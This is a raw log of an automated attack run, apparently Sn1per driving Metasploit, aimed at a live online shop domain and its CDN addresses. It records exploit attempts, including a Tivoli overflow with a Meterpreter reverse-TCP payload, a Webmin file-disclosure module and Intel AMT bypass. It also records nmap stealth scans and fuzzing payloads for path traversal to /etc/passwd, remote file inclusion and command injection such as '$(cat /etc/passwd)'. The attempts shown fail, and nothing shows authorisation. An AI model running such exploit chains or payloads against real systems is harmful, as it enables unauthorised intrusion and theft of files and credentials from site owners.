[-] 2a04:4e42::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42::649:8001 -   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42::649:8001 -   /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Running module against 2a04:4e42:200::649
[*] 2a04:4e42:200::649:8001 - Sending RMI Header...
[-] 2a04:4e42:200::649:8001 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:200::649]:8001) was unreachable.
[-] 2a04:4e42:200::649:8001 - Call stack:
[-] 2a04:4e42:200::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:200::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:200::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:200::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:200::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:200::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:200::649:8001 -   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:200::649:8001 -   /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Auxiliary module execution completed
RHOST => guestmob.myspreadshop.com
[-] 151.101.2.137:1099    - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 1 of 8 hosts (12% complete)
[-] 151.101.66.137:1099   - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 2 of 8 hosts (25% complete)
[-] 151.101.130.137:1099  - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 3 of 8 hosts (37% complete)
[-] 151.101.194.137:1099  - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
 + -- --=[Port 9495 opened... running tests...
====================================================================================•x[2022-02-21](15:52)x•
 RUNNING IBM TIVOLI ENDPOINT OVERFLOW EXPLOIT 
====================================================================================•x[2022-02-21](15:52)x•
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
SSL => false
LHOST => 127.0.0.1
LPORT => 4444
[*] Exploiting target 151.101.2.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[*] Trying target Automatic...
[*] Sending request to 151.101.2.137:9495
[*] Exploiting target 151.101.66.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[*] Trying target Automatic...
[*] Sending request to 151.101.66.137:9495
[*] Exploiting target 151.101.130.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[*] Trying target Automatic...
[*] Sending request to 151.101.130.137:9495
[*] Exploiting target 151.101.194.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[*] Trying target Automatic...
[*] Sending request to 151.101.194.137:9495
[*] Exploiting target 2a04:4e42:600::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[*] Trying target Automatic...
[*] Sending request to 2a04:4e42:600::649:9495
[*] Exploiting target 2a04:4e42::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[*] Trying target Automatic...
[*] Sending request to 2a04:4e42::649:9495
[*] Exploiting target 2a04:4e42:200::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[*] Trying target Automatic...
[*] Sending request to 2a04:4e42:200::649:9495
[*] Exploiting target 2a04:4e42:400::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[*] Trying target Automatic...
[*] Sending request to 2a04:4e42:400::649:9495
[*] Exploit completed, but no session was created.
 + -- --=[Port 10000 opened... running tests...
====================================================================================•x[2022-02-21](15:53)x•
 RUNNING WEBMIN FILE DISCLOSURE EXPLOIT 
====================================================================================•x[2022-02-21](15:53)x•
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
[*] Running module against 151.101.2.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 151.101.66.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 151.101.130.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 151.101.194.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42:400::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42:600::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42:200::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Auxiliary module execution completed
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
[*] Running module against 151.101.2.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 151.101.66.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 151.101.130.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 151.101.194.137
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42:200::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42:400::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42:600::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Running module against 2a04:4e42::649
[*] Attempting to retrieve /etc/passwd...
[*] No response from the server
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](15:55)x•
 RUNNING CVE-2019-15107 WEBMIN <= 1.920 RCE EXPLOIT 
====================================================================================•x[2022-02-21](15:55)x•
[-] No results from search
[-] Failed to load module: exploit/web/defcon_webmin_unauth_rce
LHOST => 127.0.0.1
LPORT => 4444
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
[-] Unknown command: run
[!] Changing the SSL option's value may require changing RPORT!
SSL => True
[-] Unknown command: run
 + -- --=[Port 16992 opened... running tests...
====================================================================================•x[2022-02-21](15:55)x•
 RUNNING INTEL AMT AUTH BYPASS EXPLOIT 
====================================================================================•x[2022-02-21](15:55)x•
RHOSTS => guestmob.myspreadshop.com
[*] Scanned 1 of 8 hosts (12% complete)
[*] Scanned 2 of 8 hosts (25% complete)
[*] Scanned 3 of 8 hosts (37% complete)
[*] Scanned 4 of 8 hosts (50% complete)
[*] Scanned 5 of 8 hosts (62% complete)
[*] Scanned 6 of 8 hosts (75% complete)
[*] Scanned 7 of 8 hosts (87% complete)
[*] Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
 + -- --=[Port 27017 closed... skipping.
 + -- --=[Port 27018 closed... skipping.
 + -- --=[Port 27019 closed... skipping.
 + -- --=[Port 28017 opened... running tests...
====================================================================================•x[2022-02-21](15:56)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](15:56)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:56 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:56
Completed NSE at 15:56, 0.00s elapsed
Initiating NSE at 15:56
Completed NSE at 15:56, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:56
Completed Parallel DNS resolution of 1 host. at 15:56, 0.07s elapsed
Initiating SYN Stealth Scan at 15:56
Scanning guestmob.myspreadshop.com (151.101.194.137) [1 port]
Discovered open port 28017/tcp on 151.101.194.137
Completed SYN Stealth Scan at 15:56, 0.11s elapsed (1 total ports)
Initiating Service scan at 15:56
Scanning 1 service on guestmob.myspreadshop.com (151.101.194.137)
Completed Service scan at 15:59, 159.03s elapsed (1 service on 1 host)
NSE: Script scanning 151.101.194.137.
Initiating NSE at 15:59
Completed NSE at 15:59, 15.39s elapsed
Initiating NSE at 15:59
Completed NSE at 15:59, 10.10s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.194.137)
Host is up (0.082s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.2.137 151.101.66.137 151.101.130.137 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649

PORT      STATE SERVICE VERSION
28017/tcp open  mongod?
|_mongodb-databases: ERROR: Script execution failed (use -d to debug)
|_mongodb-info: ERROR: Script execution failed (use -d to debug)
|_mongodb-brute: ERROR: Script execution failed (use -d to debug)

NSE: Script Post-scanning.
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
Initiating NSE at 15:59
Completed NSE at 15:59, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.30 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
 + -- --=[Port 49180 opened... running tests...
====================================================================================•x[2022-02-21](15:59)x•
 RUNNING JAVA RMI SCANNER 
====================================================================================•x[2022-02-21](15:59)x•
RHOSTS => guestmob.myspreadshop.com
RPORT => 49180
[-] 151.101.66.137:49180  - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:49180 - Scanned 1 of 8 hosts (12% complete)
[-] 151.101.130.137:49180 - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:49180 - Scanned 2 of 8 hosts (25% complete)
[-] 151.101.194.137:49180 - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:49180 - Scanned 3 of 8 hosts (37% complete)
[-] 151.101.2.137:49180   - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:49180 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:49180 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:49180 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:49180 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:49180 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](16:00)x•
 SCANNING ALL HTTP PORTS 
====================================================================================•x[2022-02-21](16:00)x•
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com [OK]
[*] Scanning guestmob.myspreadshop.com [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com [OK]
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com [OK]
[*] Scanning guestmob.myspreadshop.com [OK]
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[https://sn1persecurity.com
 + -- --=[Sn1per v9.0 by @xer0dayz


               ;               ,           
             ,;                 '.         
            ;:                   :;        
           ::                     ::       
           ::                     ::       
           ':                     :        
            :.                    :        
         ;' ::                   ::  '     
        .'  ';                   ;'  '.    
       ::    :;                 ;:    ::   
       ;      :;.             ,;:     ::   
       :;      :;:           ,;"      ::   
       ::.      ':;  ..,.;  ;:'     ,.;:   
        "'"...   '::,::::: ;:   .;.;""'    
            '"""....;:::::;,;.;"""         
        .:::.....'"':::::::'",...;::::;.   
       ;:' '""'"";.,;:::::;.'""""""  ':;   
      ::'         ;::;:::;::..         :;  
     ::         ,;:::::::::::;:..       :: 
     ;'     ,;;:;::::::::::::::;";..    ':.
    ::     ;:"  ::::::"""'::::::  ":     ::
     :.    ::   ::::::;  :::::::   :     ; 
      ;    ::   :::::::  :::::::   :    ;  
       '   ::   ::::::....:::::'  ,:   '   
        '  ::    :::::::::::::"   ::       
           ::     ':::::::::"'    ::       
           ':       """""""'      ::       
            ::                   ;:        
            ':;                 ;:"        
    -hrr-     ';              ,;'          
                "'           '"            
                  ''''

====================================================================================•x[2022-02-21](16:00)x•
 RUNNING TCP PORT SCAN 
====================================================================================•x[2022-02-21](16:00)x•
 + -- --=[Port 80 opened... running tests...
====================================================================================•x[2022-02-21](16:00)x•
 CHECKING HTTP HEADERS AND METHODS 
====================================================================================•x[2022-02-21](16:00)x•
HTTP/1.1 301 Moved Permanently
Server: Varnish
Retry-After: 0
Access-Control-Allow-Origin: *
Content-Length: 0
Accept-Ranges: bytes
Date: Tue, 22 Feb 2022 03:00:46 GMT
Via: 1.1 varnish
Connection: close
X-Served-By: cache-sna10727-LGB
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1645498847.830086,VS0,VE1
X-Trace-Id: f8b4d865656440de6971270c17469a6a69d7ac43
X-Application: shop
X-DNS-Prefetch-Control: on
Server-Timing: HIT-SYNTH, fastly;desc="Edge time";dur=1
Timing-Allow-Origin: *
Strict-Transport-Security: max-age=604800
location: https://guestmob.myspreadshop.com/

HTTP/1.1 301 Moved Permanently
Server: Varnish
Retry-After: 0
Access-Control-Allow-Origin: *
Content-Length: 0
Accept-Ranges: bytes
Date: Tue, 22 Feb 2022 03:00:47 GMT
Via: 1.1 varnish
Connection: close
X-Served-By: cache-lax10670-LGB
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1645498847.057893,VS0,VE0
X-Trace-Id: 245039f0f7d3cf5ee1f9be82da5e031fcfb00d5b
X-Application: shop
X-DNS-Prefetch-Control: on
Server-Timing: HIT-SYNTH, fastly;desc="Edge time";dur=0
Timing-Allow-Origin: *
Strict-Transport-Security: max-age=604800
location: https://guestmob.myspreadshop.com/

HTTP/2 200 
access-control-allow-origin: *
access-control-allow-methods: GET, POST, OPTIONS, PUT
access-control-max-age: 600
access-control-allow-headers: X-PINGOTHER,Origin,X-Requested-With,Content-Type,Accept,Accept-Encoding,DNT
cache-control: no-transform, must-revalidate, max-age=0
content-type: text/html;charset=utf-8
x-server-name: sprd-shop03_na1
server: nginx/9.5
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Tue, 22 Feb 2022 03:00:47 GMT
age: 1
x-served-by: cache-dfw18620-DFW, cache-sna10732-LGB
x-cache: MISS, HIT
x-cache-hits: 0, 1
x-timer: S1645498847.388057,VS0,VE1
vary: Accept-Encoding
x-trace-id: 861e0e2801f999c186485442d60837a8863ebb03
x-application: shop
x-dns-prefetch-control: on
server-timing: HIT-CLUSTER, fastly;desc="Edge time";dur=1
timing-allow-origin: *
strict-transport-security: max-age=604800
content-length: 176796

====================================================================================•x[2022-02-21](16:00)x•
 DISPLAYING META GENERATOR TAGS 
====================================================================================•x[2022-02-21](16:00)x•
====================================================================================•x[2022-02-21](16:00)x•
 DISPLAYING COMMENTS 
====================================================================================•x[2022-02-21](16:00)x•
====================================================================================•x[2022-02-21](16:00)x•
 DISPLAYING SITE LINKS 
====================================================================================•x[2022-02-21](16:00)x•
====================================================================================•x[2022-02-21](16:00)x•
 CHECKING FOR WAF 
====================================================================================•x[2022-02-21](16:00)x•

                ______
               /      \
              (  W00f! )
               \  ____/
               ,,    __            404 Hack Not Found
           |`-.__   / /                      __     __
           /"  _/  /_/                       \ \   / /
          *===*    /                          \ \_/ /  405 Not Allowed
         /     )__//                           \   /
    /|  /     /---`                        403 Forbidden
    \\/`   \ |                                 / _ \
    `\    /_\\_              502 Bad Gateway  / / \ \  500 Internal Error
      `_____``-`                             /_/   \_\

                        ~ WAFW00F : v2.1.0 ~
        The Web Application Firewall Fingerprinting Toolkit
    
[*] Checking http://guestmob.myspreadshop.com
[+] Generic Detection results:
[-] No WAF detected by the generic detection
[~] Number of requests: 7

====================================================================================•x[2022-02-21](16:00)x•
 GATHERING HTTP INFO 
====================================================================================•x[2022-02-21](16:00)x•
http://guestmob.myspreadshop.com:80 [301 Moved Permanently] Country[UNITED STATES][US], HTTPServer[Varnish], IP[151.101.66.137], RedirectLocation[https://guestmob.myspreadshop.com/], Strict-Transport-Security[max-age=604800], UncommonHeaders[retry-after,access-control-allow-origin,x-served-by,x-cache-hits,x-timer,x-trace-id,x-application,x-dns-prefetch-control,server-timing,timing-allow-origin], Varnish, Via-Proxy[1.1 varnish]
https://guestmob.myspreadshop.com/ [200 OK] Access-Control-Allow-Methods[GET, POST, OPTIONS, PUT], Country[UNITED STATES][US], Email[service@spreadshirt.com], HTML5, HTTPServer[nginx/9.5], IP[151.101.2.137], Open-Graph-Protocol[website], PoweredBy[Pros], Script[application/ld+json], Strict-Transport-Security[max-age=604800], Title[GuestMob], UncommonHeaders[access-control-allow-origin,access-control-allow-methods,access-control-max-age,access-control-allow-headers,x-server-name,x-served-by,x-cache-hits,x-timer,x-trace-id,x-application,x-dns-prefetch-control,server-timing,timing-allow-origin], Via-Proxy[1.1 varnish, 1.1 varnish], nginx[9.5]

====================================================================================•x[2022-02-21](16:01)x•
 GATHERING WEB FINGERPRINT 
====================================================================================•x[2022-02-21](16:01)x•
 Varnish 
 Nginx 9.5
 access-control-max-age: 600
 access-control-allow-headers: X-PINGOTHER,Origin,X-Requested-With,Content-Type,Accept,Accept-Encoding,DNT
 x-server-name: sprd-shop03_na1
 X-Served-By: cache-dfw18669-DFW, cache-sna10735-LGB
 X-Trace-Id: 2d407421172e1146eef139a304397177a13c22e5
 X-Application: shop
 X-DNS-Prefetch-Control: on
 Server-Timing: HIT-CLUSTER, fastly;desc="Edge time";dur=1
 Timing-Allow-Origin: *
====================================================================================•x[2022-02-21](16:01)x•
 SAVING SCREENSHOTS 
====================================================================================•x[2022-02-21](16:01)x•
webscreenshot.py version 2.2.1

[+] 1 URLs to be screenshot
[+] 1 actual URLs screenshot
[+] 0 error(s)
====================================================================================•x[2022-02-21](16:01)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](16:01)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 16:01 EST
NSE: Loaded 50 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:01
Completed NSE at 16:01, 0.00s elapsed
Initiating NSE at 16:01
Completed NSE at 16:01, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:01
Completed Parallel DNS resolution of 1 host. at 16:01, 0.06s elapsed
Initiating SYN Stealth Scan at 16:01
Scanning guestmob.myspreadshop.com (151.101.66.137) [1 port]
Discovered open port 80/tcp on 151.101.66.137
Completed SYN Stealth Scan at 16:01, 0.09s elapsed (1 total ports)
Initiating Service scan at 16:01
Scanning 1 service on guestmob.myspreadshop.com (151.101.66.137)
Completed Service scan at 16:01, 6.15s elapsed (1 service on 1 host)
NSE: Script scanning 151.101.66.137.
Initiating NSE at 16:01
Completed NSE at 16:01, 5.61s elapsed
Initiating NSE at 16:01
Completed NSE at 16:01, 0.55s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.66.137)
Host is up (0.081s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.130.137 151.101.194.137 151.101.2.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649

PORT   STATE SERVICE    VERSION
80/tcp open  http-proxy Varnish
| http-brute:   
|_  Path "/" does not require authentication

NSE: Script Post-scanning.
Initiating NSE at 16:01
Completed NSE at 16:01, 0.00s elapsed
Initiating NSE at 16:01
Completed NSE at 16:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.06 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
====================================================================================•x[2022-02-21](16:01)x•
 RUNNING PASSIVE WEB SPIDER 
====================================================================================•x[2022-02-21](16:01)x•
====================================================================================•x[2022-02-21](16:02)x•
 FETCHING WAYBACK MACHINE URLS 
====================================================================================•x[2022-02-21](16:02)x•
====================================================================================•x[2022-02-21](16:02)x•
 FETCHING HACKERTARGET URLS 
====================================================================================•x[2022-02-21](16:02)x•
https://www.spreadshop.com/?affiliateid=12833
https://youtube.com/BeOurGuest
https://service.spreadshirt.com/hc/en-us/articles/115000978409/?shop_name=GuestMob&shop_id=100232229&platform=na
https://service.spreadshirt.com/hc/en-us/articles/115000991305/?shop_name=GuestMob&shop_id=100232229&platform=na
https://service.spreadshirt.com/hc/en-us/articles/115000991325/?shop_name=GuestMob&shop_id=100232229&platform=na
https://service.spreadshirt.com/hc/en-us/?shop_name=GuestMob&shop_id=100232229&platform=na
https://service.spreadshirt.com/hc/en-us/articles/115000993925/?shop_name=GuestMob&shop_id=100232229&platform=na
https://youtube.com/BeOurGuest
https://partner.spreadshirt.com/shop-register/?affiliateid=12441
====================================================================================•x[2022-02-21](16:02)x•
 FETCHING GUA URLS 
====================================================================================•x[2022-02-21](16:02)x•
====================================================================================•x[2022-02-21](16:02)x•
 RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN 
====================================================================================•x[2022-02-21](16:02)x•


                _.._
              .'    '.
             /   __   \ 
          ,  |   ><   |  ,
         . \  \      /  / .
          \_'--`(  )'--'_/
            .--'/()'--.
@xer0dayz  /  /` '' `\  \ 
             |        |
              \      /


 + -- --=[ https://sn1persecurity.com
 + -- --=[ blackwidow v1.3 by @xer0dayz 




                _.._
              .'    '.
             /   __   \ 
          ,  |   ><   |  ,
         . \  \      /  / .
          \_'--`(  )'--'_/
            .--'/()'--.
@xer0dayz  /  /` '' `\  \ 
             |        |
              \      /


 + -- --=[ https://sn1persecurity.com
 + -- --=[ blackwidow v1.3 by @xer0dayz 

[+] URL's Discovered: 
/usr/share/blackwidow/guestmob.myspreadshop.com_80/guestmob.myspreadshop.com_80-urls-sorted.txt
__________________________________________________________________________________________________

[+] Dynamic URL's Discovered: 
/usr/share/blackwidow/guestmob.myspreadshop.com_80/guestmob.myspreadshop.com_80-dynamic-sorted.txt
__________________________________________________________________________________________________

[+] Form URL's Discovered: 
/usr/share/blackwidow/guestmob.myspreadshop.com_80/guestmob.myspreadshop.com_80-forms-sorted.txt
__________________________________________________________________________________________________

[+] Unique Dynamic Parameters Discovered: 
/usr/share/blackwidow/guestmob.myspreadshop.com_80/guestmob.myspreadshop.com_80-dynamic-unique.txt
__________________________________________________________________________________________________

[+] Sub-domains Discovered: 
/usr/share/blackwidow/guestmob.myspreadshop.com_80/guestmob.myspreadshop.com_80-subdomains-sorted.txt
__________________________________________________________________________________________________

[+] Emails Discovered: 
/usr/share/blackwidow/guestmob.myspreadshop.com_80/guestmob.myspreadshop.com_80-emails-sorted.txt
__________________________________________________________________________________________________

[+] Phones Discovered: 
/usr/share/blackwidow/guestmob.myspreadshop.com_80/guestmob.myspreadshop.com_80-phones-sorted.txt
__________________________________________________________________________________________________

[+] Loot Saved To: 
/usr/share/blackwidow/guestmob.myspreadshop.com_80/
__________________________________________________________________________________________________

^[[B      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> http://guestmob.myspreadshop.com:80////checkmate%2C+bitch!?idea=5a4acad55d52cd4721c4a43b [200] [321452]
======================================================================================================

>>> http://guestmob.myspreadshop.com:80////checkmate%2C+bitch!?idea=5a4acad55d52cd4721c4a43b [200] [321452]
======================================================================================================
[D] Fuzzing Parameter: idea=
----------------------------------------------------
[i] Trying Payload: google.com
[i] Trying Payload: //google.com
[i] Trying Payload: https%3A//google.com
[i] Trying Payload: INJECTX
[i] New URL: http://guestmob.myspreadshop.com:80////checkmate%2C+bitch!?idea=INJECTX [200] [300226] [21226]
[+] Reflected Value Detected! 
[i] Trying Payload: '
[i] Trying Payload: \
[i] Trying Payload: /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
[i] Trying Payload: /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
[i] Trying Payload: ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00test.htm
[i] Trying Payload: ..%2fWEB-INF%2fweb.xml
[i] Trying Payload: /../../../../../../../../../../../../../../../../../etc/passwd
[i] Trying Payload: /../../../../../../../../../../../../../../../../../etc/passwd%00
[i] Trying Payload: /etc/passwd
[i] Trying Payload: /etc/passwd%00
[i] Trying Payload: C:\boot.ini
[i] Trying Payload: C:\boot.ini%00
[i] Trying Payload: hTtP://tests.arachni-scanner.com/rfi.md5.txt
[i] Trying Payload: hTtP://tests.arachni-scanner.com/rfi.md5.txt%00
[i] Trying Payload: %7B%7B1336%252B1%7D%7D
[i] Trying Payload: 1336%2B1
[i] Trying Payload: %24%28cat%2B/etc/passwd%29
[i] Trying Payload: %24%28sleep%2B10%29
[i] Trying Payload: phpinfo%28%29
[i] Trying Payload: 1336%2B1
[i] Trying Payload: 1336%2B1
______________________________________________________________________________________________________


      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> http://guestmob.myspreadshop.com:80//about//accessories+aprons?q=P49 [200] [239421]
======================================================================================================

>>> http://guestmob.myspreadshop.com:80//about//accessories+aprons?q=P49 [200] [239421]
======================================================================================================
[D] Fuzzing Parameter: q=
----------------------------------------------------
[i] Trying Payload: google.com
[i] Trying Payload: //google.com
[i] Trying Payload: https%3A//google.com
[i] Trying Payload: INJECTX
[i] Trying Payload: '
[i] Trying Payload: \
[i] Trying Payload: /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
[i] Trying Payload: /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
[i] Trying Payload: ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00test.htm
[i] Trying Payload: ..%2fWEB-INF%2fweb.xml
[i] Trying Payload: /../../../../../../../../../../../../../../../../../etc/passwd
[i] Trying Payload: /../../../../../../../../../../../../../../../../../etc/passwd%00
[i] Trying Payload: /etc/passwd
[i] Trying Payload: /etc/passwd%00
[i] Trying Payload: C:\boot.ini
[i] Trying Payload: C:\boot.ini%00
[i] Trying Payload: hTtP://tests.arachni-scanner.com/rfi.md5.txt
[i] Trying Payload: hTtP://tests.arachni-scanner.com/rfi.md5.txt%00
[i] Trying Payload: %7B%7B1336%252B1%7D%7D
[i] Trying Payload: 1336%2B1
[i] Trying Payload: %24%28cat%2B/etc/passwd%29
[i] Trying Payload: %24%28sleep%2B10%29
[i] Trying Payload: phpinfo%28%29
[i] Trying Payload: 1336%2B1
[i] Trying Payload: 1336%2B1
______________________________________________________________________________________________________

[-] 151.101.2.137:23      - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 1 of 8 hosts (12% complete)
[-] 151.101.66.137:23     - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 2 of 8 hosts (25% complete)
[-] 151.101.130.137:23    - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 3 of 8 hosts (37% complete)
[-] 151.101.194.137:23    - A network issue has occurred: Connection reset by peer
[*] guestmob.myspreadshop.com:23 - Scanned 4 of 8 hosts (50% complete)
[-] 2a04:4e42:400::649:23 - A network issue has occurred: The host ([2a04:4e42:400::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 5 of 8 hosts (62% complete)
[-] 2a04:4e42:600::649:23 - A network issue has occurred: The host ([2a04:4e42:600::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 6 of 8 hosts (75% complete)
[-] 2a04:4e42::649:23     - A network issue has occurred: The host ([2a04:4e42::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 7 of 8 hosts (87% complete)
[-] 2a04:4e42:200::649:23 - A network issue has occurred: The host ([2a04:4e42:200::649]:23) was unreachable.
[*] guestmob.myspreadshop.com:23 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
[*] guestmob.myspreadshop.com:23 - Scanned 1 of 8 hosts (12% complete)
